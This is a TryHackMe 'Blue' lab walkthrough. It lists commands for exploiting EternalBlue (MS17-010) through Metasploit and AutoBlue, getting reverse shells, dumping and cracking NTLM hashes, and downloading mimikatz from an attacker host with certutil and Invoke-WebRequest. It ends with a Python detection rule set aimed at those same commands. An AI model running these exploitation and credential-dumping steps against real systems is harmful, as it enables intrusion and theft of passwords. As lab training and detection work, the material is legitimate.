TryHackMe : Blue

1. Scan the machine.
nmap -Pn <ip>
nmap -A -T 5 <ip> -vv
nmap --script vuln <ip> -vv
2. Start Metasploit
msfconsole
search ms17–010
use 2
show options
set RHOSTS <target ip>
run
3. If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
background
sessions
use multi/manage/shell_to_meterpreter
set LPORT 1234
set SESSION 1
run
sessions
sessions 2
getsystem
shell
whoami
ps
migrate 708
4. Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
hashdump
hashcat -a 0 -m 1000 hashforcrack.txt rockyou.txt --force --username --show

Explaining the options:
“-a 0” means attack mode 0
“-m 1000” means NTLM hash
“--force” means my machine does not have a native Intel OpenCL runtime, so I need to force it.
“--username” means ignore the username in the file
“--show” means show the cracked password
cat flag1.txt
cat flag2.txt
cat flag3.txt
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
python eternal_checker.py <target ip>
cd shellcode
./shell_prep.sh
1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y
2. LHOST : <attacker ip>
3. LPORT x64 : 4444
4. LPORT x86 : 5555
5. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 1
6. Type 0 to generate a staged payload or 1 to generate a stageless payload : 0
nc -lvp 4444
nc -lvp 5555
cd ..
ls
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
cd shellcode
rm sc*
ls
./shell_prep.sh
1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y
2. LHOST : <attacker ip>
3. LPORT x64 : 8888
4. LPORT x86 : 9999
5. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 1
6. Type 0 to generate a staged payload or 1 to generate a stageless payload : 1
nc -lvp 8888
nc -lvp 9999
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
cd \
dir flag* /s /b
python -m SimpleHTTPServer 1234
powershell -c "Invoke-WebRequest -OutFile mimikatz.exe http://<attacker ip>:<attacker port>/mimikatz.exe"
certutil.exe -urlcache -f http://<attacker ip>:<attacker port>/mimikatz.exe mimikatz.exe
dir
mimikatz.exe
lsadump::sam
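On the defensive side, the certutil and Invoke-WebRequest downloads and the mimikatz run above are exactly the command lines a process-creation detection should flag. The following is an added example, not part of the original walkthrough; it assumes Windows process-creation events rendered as key="value" text (Sysmon Event ID 1 style) with a CommandLine field, and the rule regexes and sample events are constructed for illustration.

```python
import re
from typing import List, Tuple

# Detection rules keyed on the download-and-execute and credential-dump commands used
# in the walkthrough. Regexes are constructed for this example (assumption: Windows
# process-creation telemetry with a CommandLine field, e.g. Sysmon Event ID 1).
RULES = [
    ("certutil_url_download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("powershell_web_download",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\b(?:invoke-webrequest|iwr|downloadfile)\b", re.I)),
    ("mimikatz_credential_dump",
     re.compile(r"\bmimikatz\b|lsadump::", re.I)),
]

CMDLINE = re.compile(r'CommandLine="([^"]*)"')


def command_line(event: str) -> str:
    """Pull the CommandLine field out of a key="value" formatted event line."""
    m = CMDLINE.search(event)
    return m.group(1) if m else ""


def detect(events: List[str]) -> List[Tuple[str, str]]:
    """Return (rule_name, command_line) for every rule each event matches."""
    hits = []
    for event in events:
        cmd = command_line(event)
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, cmd))
    return hits


# Constructed sample events, not real telemetry. The first three replay the commands
# above with a placeholder attacker address; the last two are benign admin noise.
SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil.exe -urlcache -f http://10.10.10.10:1234/mimikatz.exe mimikatz.exe"',
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell -c Invoke-WebRequest -OutFile mimikatz.exe http://10.10.10.10:1234/mimikatz.exe"',
    'EventID=1 Image=C:\\Users\\Jon\\mimikatz.exe CommandLine="mimikatz.exe"',
    'EventID=1 Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -hashfile C:\\Windows\\notepad.exe SHA256"',
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell -c Get-Process"',
]

if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

Note that the download events fire twice (once for the download technique, once because the fetched file is named mimikatz.exe), while the legitimate certutil -hashfile call is not flagged because the rule requires -urlcache with a URL.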

ratiros01